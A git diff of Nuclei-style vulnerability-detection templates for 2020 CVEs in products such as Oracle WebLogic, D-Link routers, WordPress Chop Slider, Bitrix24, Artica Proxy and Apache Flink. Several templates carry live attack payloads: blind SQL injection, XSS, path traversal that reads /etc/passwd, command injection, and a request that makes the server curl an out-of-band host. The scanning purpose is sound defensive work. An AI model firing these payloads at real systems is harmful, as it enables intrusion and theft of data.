+ - https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
+ - https://github.com/euphrat1ca/CVE-2020-0618
+ - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618
+ - http://packetstormsecurity.com/files/156707/SQL-Server-Reporting-Services-SSRS-ViewState-Deserialization.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-0618
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2020-0618
+ cwe-id: CWE-502
+ epss-score: 0.97439
+ epss-percentile: 0.99944
+ cpe: cpe:2.3:a:microsoft:sql_server:2012:sp4:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: microsoft
+ product: sql_server
+ tags: cve,cve2020,rce,packetstorm,microsoft
- # THIS TEMPLATE IS ONLY FOR DETECTING
- # To carry out further attacks, please see reference[1] below.
- # This template works by guessing user ID.
-
- # References:
- # - [1] https://github.com/euphrat1ca/CVE-2020-0618
- # - [2] https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
-
-requests:
+http:
- method: GET
path:
- "{{BaseURL}}/ReportServer/Pages/ReportViewer.aspx"
+
matchers-condition: and
matchers:
- - type: status
- status:
- - 200
- type: word
+ part: body
words:
- "view report"
- part: body
\ No newline at end of file
+
+ - type: status
+ status:
+ - 200
+# digest: 4a0a0047304502207796ce5eaeb19be44756799ab9d240f55cdec21a63358cf9caa45d531049dae8022100f4079b7480e397faab25a83a473d2ce4982b3ca232f2099abc0fd57970acc66e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-11529.yaml b/poc/cve/cve-2020-11529.yaml
index ebb90a2a7b..02c6e86d2e 100644
--- a/poc/cve/cve-2020-11529.yaml
+++ b/poc/cve/cve-2020-11529.yaml
@@ -1,28 +1,31 @@
id: CVE-2020-11529
info:
- name: Grav 1.7 Open Redirect
+ name: Grav <1.7 - Open Redirect
author: 0x_Akoko
severity: medium
- description: Common/Grav.php in Grav before 1.7 has an Open Redirect. This is partially fixed in 1.6.23 and still present in 1.6.x.
+ description: Grav before 1.7 has an open redirect vulnerability via common/Grav.php. This is partially fixed in 1.6.23 and still present in 1.6.x.
reference:
- https://github.com/getgrav/grav/issues/3134
- https://www.cvedetails.com/cve/CVE-2020-11529
- tags: cve,cve2019,redirect,grav.getgrav
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-11529
+ - https://github.com/getgrav/grav/commit/2eae104c7a4bf32bc26cb8073d5c40464bfda3f7
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2020-11529
cwe-id: CWE-601
+ tags: cve,cve2019,redirect,grav,getgrav
requests:
- method: GET
-
path:
- '{{BaseURL}}/%252f%255cexample.com%252fa%253fb/'
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
part: header
+
+# Enhanced by mp on 2022/05/04
diff --git a/poc/cve/cve-2020-11530.yaml b/poc/cve/cve-2020-11530.yaml
new file mode 100644
index 0000000000..5b39e49bf0
--- /dev/null
+++ b/poc/cve/cve-2020-11530.yaml
@@ -0,0 +1,50 @@
+id: CVE-2020-11530
+
+info:
+ name: WordPress Chop Slider 3 - Blind SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
+ remediation: |
+ Update to the latest version of the WordPress Chop Slider 3 plugin to mitigate the vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/f10cd7d7-6a31-48e5-994c-b100c846001a
+ - https://github.com/idangerous/plugins/tree/master/Chop%20Slider%203/Chop%20Slider%203%20Wordpress
+ - https://idangero.us/
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-11530
+ - http://seclists.org/fulldisclosure/2020/May/26
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-11530
+ cwe-id: CWE-89
+ epss-score: 0.83664
+ epss-percentile: 0.98377
+ cpe: cpe:2.3:a:idangero:chop_slider:3.0:*:*:*:*:wordpress:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: idangero
+ product: chop_slider
+ framework: wordpress
+ tags: cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero
+
+http:
+ - raw:
+ - |
+ @timeout 10s
+ GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 200'
+ - 'contains(content_type, "application/javascript")'
+ - 'contains(body, "$(document).ready(function()")'
+ condition: and
+# digest: 4a0a00473045022040f98bb17cb9dd9f543c8f2a14720c7f926c37a4822e9727295abb4bd8b955aa022100c62613f04ac8afcfd750afc1188d0f3f04a2461b90b206d23c4243070659aedf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-11854.yaml b/poc/cve/cve-2020-11854.yaml
new file mode 100644
index 0000000000..ee377b4cdd
--- /dev/null
+++ b/poc/cve/cve-2020-11854.yaml
@@ -0,0 +1,39 @@
+id: CVE-2020-11854
+
+info:
+ name: Micro Focus UCMDB - Remote Code Execution
+ author: dwisiswant0
+ severity: critical
+ description: |
+ Micro Focus UCMDB is susceptible to remote code execution. Impacted products include Operation Bridge Manager versions 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions, and Operations Bridge (containerized) 2020.05, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. 3.), and Application Performance Management versions 9,51, 9.50 and 9.40 with UCMDB 10.33 CUP 3.
+ reference:
+ - http://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.html
+ - https://softwaresupport.softwaregrp.com/doc/KM03747658
+ - https://softwaresupport.softwaregrp.com/doc/KM03747657
+ - https://softwaresupport.softwaregrp.com/doc/KM03747854
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-11854
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-11854
+ cwe-id: CWE-798
+ tags: cve,cve2020,ucmdb,rce,microfocus
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ucmdb-api/connect"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "HttpUcmdbServiceProviderFactoryImpl"
+ - "ServerVersion=11.6.0"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/05/16
diff --git a/poc/cve/cve-2020-13121.yaml b/poc/cve/cve-2020-13121.yaml
index 7f8d07ee1b..cd7764f649 100644
--- a/poc/cve/cve-2020-13121.yaml
+++ b/poc/cve/cve-2020-13121.yaml
@@ -1,28 +1,46 @@
id: CVE-2020-13121
info:
- name: Submitty 20.04.01 - Open redirect
+ name: Submitty <= 20.04.01 - Open Redirect
author: 0x_Akoko
severity: medium
- description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt.
+ description: Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+ impact: |
+ An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
+ remediation: |
+ Upgrade to Submitty version 20.04.01 or later to fix the open redirect vulnerability.
reference:
- https://github.com/Submitty/Submitty/issues/5265
- - https://www.cvedetails.com/cve/CVE-2020-13121
- tags: cve,cve2020,redirect,submitty
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-13121
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2020-13121
cwe-id: CWE-601
+ epss-score: 0.00235
+ epss-percentile: 0.60944
+ cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: rcos
+ product: submitty
+ tags: cve,cve2020,redirect,submitty,oos,rcos
-requests:
- - method: GET
+http:
+ - raw:
+ - |
+ POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Referer: {{RootURL}}/authentication/login
- path:
- - '{{BaseURL}}/authentication/login?old=http%3A%2F%2Flexample.com'
+ user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login
matchers:
- type: regex
- regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
+# digest: 4a0a0047304502206f176277eec35ef135b67c205d1cdacbf6a6d6a914b0330fc921447e4d77f10a022100d548e0e86bb67accdbea62a2cb11ff6fdfd956cb47edb0909e50b0bb2324b033:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-13158.yaml b/poc/cve/cve-2020-13158.yaml
index 5a8b77b70b..758e2c7ab3 100644
--- a/poc/cve/cve-2020-13158.yaml
+++ b/poc/cve/cve-2020-13158.yaml
@@ -1,27 +1,41 @@
id: CVE-2020-13158
+
info:
- name: Artica Proxy before 4.30.000000 Community Edition - Directory Traversal
+ name: Artica Proxy Community Edition <4.30.000000 - Local File Inclusion
author: 0x_Akoko
severity: high
- description: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter.
+ description: Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system.
+ remediation: |
+ Upgrade to Artica Proxy Community Edition version 4.30.000000 or later to fix the Local File Inclusion vulnerability.
reference:
- https://github.com/InfoSec4Fun/CVE-2020-13158
- - https://www.cvedetails.com/cve/CVE-2020-13158
+ - https://sourceforge.net/projects/artica-squid/files/
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-13158
+ - https://github.com/nomi-sec/PoC-in-GitHub
+ - https://github.com/soosmile/POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-13158
cwe-id: CWE-22
- tags: cve,cve2020,artica,lfi
+ epss-score: 0.96791
+ epss-percentile: 0.99659
+ cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:*
+ metadata:
+ max-request: 1
+ vendor: articatech
+ product: artica_proxy
+ tags: cve,cve2020,artica,lfi,articatech
-requests:
+http:
- method: GET
path:
- "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
-
- type: regex
regex:
- "root:[x*]:0:0"
@@ -29,3 +43,4 @@ requests:
- type: status
status:
- 200
+# digest: 490a0046304402205aa5e4fc4a2fc1a974f36ab4c73ca7f8d970a1a6bd7e14394f238fa34179b721022061838c49e3fa2d0486bfc7a85f72858cbe25daf49758350e33522632ea43a507:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-13483.yaml b/poc/cve/cve-2020-13483.yaml
new file mode 100644
index 0000000000..82a960c043
--- /dev/null
+++ b/poc/cve/cve-2020-13483.yaml
@@ -0,0 +1,42 @@
+id: CVE-2020-13483
+
+info:
+ name: Bitrix24 through 20.0.0 allows XSS
+ author: pikpikcu,3th1c_yuk1
+ severity: medium
+ description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
+ reference:
+ - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
+ - https://twitter.com/brutelogic/status/1483073170827628547
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2020-13483
+ cwe-id: CWE-79
+ tags: cve,cve2020,xss,bitrix
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'
+ - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ part: body
+ words:
+ - '*/)});function __MobileAppList(){alert(1)}//'
+ - "function(handler){};function __MobileAppList(test){alert(document.domain);};//"
+ condition: or
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2020-13937.yaml b/poc/cve/cve-2020-13937.yaml
index a48b165d9a..53149fd717 100644
--- a/poc/cve/cve-2020-13937.yaml
+++ b/poc/cve/cve-2020-13937.yaml
@@ -1,12 +1,10 @@
id: CVE-2020-13937
info:
- name: Apache Kylin - Exposed Configuration File
+ name: Apache Kylin Exposed Configuration File
author: pikpikcu
severity: medium
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
- remediation: |
- Secure the configuration file by restricting access permissions and implementing proper access controls.
reference:
- https://kylin.apache.org/docs/release_notes.html
- https://s.tencent.com/research/bsafe/1156.html
@@ -16,38 +14,31 @@ info:
cvss-score: 5.3
cve-id: CVE-2020-13937
cwe-id: CWE-922
- epss-score: 0.97368
- epss-percentile: 0.99884
- cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:*
- metadata:
- max-request: 1
- vendor: apache
- product: kylin
tags: cve,cve2020,apache
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/kylin/api/admin/config"
-
headers:
- Content-Type: "application/json"
+ Content-Type: application/json
matchers-condition: and
matchers:
+ - type: status
+ status:
+ - 200
+
- type: word
- part: header
words:
- "application/json"
+ part: header
- type: word
- part: body
words:
- config
- kylin.metadata.url
condition: and
+ part: body
- - type: status
- status:
- - 200
-# digest: 490a0046304402203e2604d729ad3b0bdb557657efc64a99178606b4f5fed9949f0281070e45b61e02203ee30c0ba28d8851fa7d7a148d602915e6bba4899458a7b893eff71d1c433057:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# Enhanced by cs on 2022/02/28
diff --git a/poc/cve/cve-2020-13942.yaml b/poc/cve/cve-2020-13942.yaml
index 44ed589718..c7148c6357 100644
--- a/poc/cve/cve-2020-13942.yaml
+++ b/poc/cve/cve-2020-13942.yaml
@@ -1,25 +1,32 @@
id: CVE-2020-13942
info:
- name: Apache Unomi Remote Code Execution
+ name: Apache Unomi <1.5.2 - Remote Code Execution
author: dwisiswant0
severity: critical
description: |
- Remote Code Execution in Apache Unomi.
Apache Unomi allows conditions to use OGNL and MVEL scripting which
offers the possibility to call static Java classes from the JDK
that could execute code with the permission level of the running Java process.
- This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later.
-
- References:
+ This vulnerability affects all versions of Apache Unomi prior to 1.5.2.
+ reference:
- https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
- https://twitter.com/chybeta/status/1328912309440311297
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-13942
+ - http://unomi.apache.org./security/cve-2020-13942.txt
+ - https://lists.apache.org/thread.html/r4a8fa91836687eaca42b5420a778ca8c8fd3a3740e4cf4401acc9118@%3Cusers.unomi.apache.org%3E
+ remediation: Apache Unomi users should upgrade to 1.5.2 or later.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-13942
+ cwe-id: CWE-74
+ tags: cve,cve2020,apache,rce
requests:
- method: POST
path:
- "{{BaseURL}}/context.json"
- - "{{BaseURL}}:8181/context.json"
headers:
Content-Type: application/json
body: |
@@ -41,20 +48,24 @@ requests:
],
"sessionId": "nuclei"
}
+
matchers-condition: and
matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "application/json"
- - "context-profile-id"
- condition: and
- part: header
- type: regex
+ part: body
regex:
- "(profile|session)(Id|Properties|Segments)"
- "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"
condition: and
- part: body
\ No newline at end of file
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
+ - "context-profile-id"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/05/16
diff --git a/poc/cve/cve-2020-14413.yaml b/poc/cve/cve-2020-14413.yaml
new file mode 100644
index 0000000000..c1fef5a335
--- /dev/null
+++ b/poc/cve/cve-2020-14413.yaml
@@ -0,0 +1,38 @@
+id: CVE-2020-14413
+
+info:
+ name: NeDi 1.9C XSS
+ author: pikpikcu
+ severity: medium
+ description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily
+ bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.
+ reference:
+ - https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2020-14413
+ cwe-id: CWE-79
+ tags: cve,cve2020,nedi,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - " "
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
\ No newline at end of file
diff --git a/poc/cve/cve-2020-14750.yaml b/poc/cve/cve-2020-14750.yaml
index 14f1c528fe..fc9e6d83c2 100644
--- a/poc/cve/cve-2020-14750.yaml
+++ b/poc/cve/cve-2020-14750.yaml
@@ -1,34 +1,42 @@
id: CVE-2020-14750
info:
- name: Oracle WebLogic Server - Remote Code Execution
+ name: Oracle WebLogic Server - Remote Command Execution
author: princechaddha,DhiyaneshDk
severity: critical
description: |
- This Security Alert addresses CVE-2020-14750, a remote code execution vulnerability in Oracle WebLogic Server.
- This vulnerability is related to CVE-2020-14882, which was addressed in the October 2020 Critical Patch Update.
- It is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password.
+ Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised machine without entering necessary credentials. See also CVE-2020-14882, which is addressed in the October 2020 Critical Patch Update.
+ impact: |
+ Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the WebLogic server.
+ remediation: |
+ Apply the latest security patches provided by Oracle to mitigate this vulnerability.
reference:
- https://github.com/pprietosanchez/CVE-2020-14750
- https://www.oracle.com/security-alerts/alert-cve-2020-14750.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14750
- https://nvd.nist.gov/vuln/detail/CVE-2020-14750
+ - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-14750
+ epss-score: 0.97544
+ epss-percentile: 0.99996
+ cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:*
metadata:
+ verified: true
+ max-request: 1
+ vendor: oracle
+ product: fusion_middleware
shodan-query: http.html:"Weblogic Application Server"
- verified: "true"
- tags: cve,cve2020,rce,oracle,weblogic,unauth,kev
+ tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm
-requests:
+http:
- raw:
- |
@timeout: 10s
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}}
- User-Agent: curl/7.79.1
Accept: */*
cmd: curl {{interactsh-url}}
Content-Type: application/x-www-form-urlencoded
@@ -53,7 +61,7 @@ requests:
matchers-condition: and
matchers:
- type: word
- part: interactsh_protocol # Confirms DNS Interaction
+ part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
@@ -66,3 +74,4 @@ requests:
part: body
regex:
- '(.*)'
+# digest: 4b0a0048304602210089aca28d5d41776ea96aa0bb6616121eee0ef6ec762a650669fc5f6e650aab49022100c700af3059d9fd95fe63ddec43493d48232678dc50bc266a2f8cfaa26d4fcc09:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-16920.yaml b/poc/cve/cve-2020-16920.yaml
new file mode 100644
index 0000000000..9ee424ed7d
--- /dev/null
+++ b/poc/cve/cve-2020-16920.yaml
@@ -0,0 +1,70 @@
+id: CVE-2019-16920
+
+info:
+ name: D-Link Routers - Remote Code Execution
+ author: dwisiswant0
+ severity: critical
+ description: D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
+ impact: |
+ Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected router, potentially leading to complete compromise of the device and the network it is connected to.
+ remediation: |
+ Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-16920
+ - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
+ - https://fortiguard.com/zeroday/FG-VD-19-117
+ - https://www.seebug.org/vuldb/ssvid-98079
+ - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2019-16920
+ cwe-id: CWE-78
+ epss-score: 0.96307
+ epss-percentile: 0.99507
+ cpe: cpe:2.3:o:dlink:dir-655_firmware:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 3
+ vendor: dlink
+ product: dir-655_firmware
+ tags: cve2019,cve,dlink,rce,router,unauth,kev
+
+http:
+ - raw:
+ - |
+ POST /apply_sec.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Referer: {{BaseURL}}
+
+ html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384
+ - |
+ POST /apply_sec.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Referer: {{BaseURL}}/login_pic.asp
+ Cookie: uid=1234123
+
+ html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}
+ - |
+ POST /apply_sec.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Referer: {{BaseURL}}/login_pic.asp
+ Cookie: uid=1234123
+
+ html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}}
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+ - "\\[(font|extension|file)s\\]"
+ condition: or
+
+ - type: status
+ status:
+ - 200
+# digest: 490a0046304402205bd1c811f20a4e5f920c3f544f1d69b4a68699c8aacf72059425ae3b99891e2602200d3bb9646a016bf7121e2ce0bfaa71a950182aeed674967fd41119b0976d5907:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-17519.yaml b/poc/cve/cve-2020-17519.yaml
index 926d6f1974..1585625f0b 100644
--- a/poc/cve/cve-2020-17519.yaml
+++ b/poc/cve/cve-2020-17519.yaml
@@ -2,11 +2,20 @@ id: CVE-2020-17519
info:
name: Apache Flink directory traversal
- author: pd-team
+ author: pdteam
severity: high
description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
-
- # Source: https://github.com/B1anda0/CVE-2020-17519
+ reference:
+ - https://github.com/B1anda0/CVE-2020-17519
+ - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E
+ - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E
+ - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2020-17519
+ cwe-id: CWE-552
+ tags: cve,cve2020,apache,lfi,flink
requests:
- method: GET
@@ -19,5 +28,5 @@ requests:
- 200
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
diff --git a/poc/cve/cve-2020-17530.yaml b/poc/cve/cve-2020-17530.yaml
index 38f8bbbfaa..c39f87389c 100644
--- a/poc/cve/cve-2020-17530.yaml
+++ b/poc/cve/cve-2020-17530.yaml
@@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-17530
cwe-id: CWE-917
- tags: cve,cve2020,apache,rce,struts,kev
+ tags: cve,cve2020,apache,rce,struts
requests:
- method: GET
diff --git a/poc/cve/cve-2020-20988.yaml b/poc/cve/cve-2020-20988.yaml
index 6672172c5b..07f450bdb6 100644
--- a/poc/cve/cve-2020-20988.yaml
+++ b/poc/cve/cve-2020-20988.yaml
@@ -6,6 +6,10 @@ info:
severity: medium
description: |
DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
+ remediation: |
+ Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
reference:
- https://mycvee.blogspot.com/p/xss2.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-20988
@@ -14,11 +18,17 @@ info:
cvss-score: 5.4
cve-id: CVE-2020-20988
cwe-id: CWE-79
+ epss-score: 0.0009
+ epss-percentile: 0.37789
+ cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:*
metadata:
- verified: "true"
- tags: cve,cve2020,domainmod,xss,authenticated
+ verified: true
+ max-request: 2
+ vendor: domainmod
+ product: domainmod
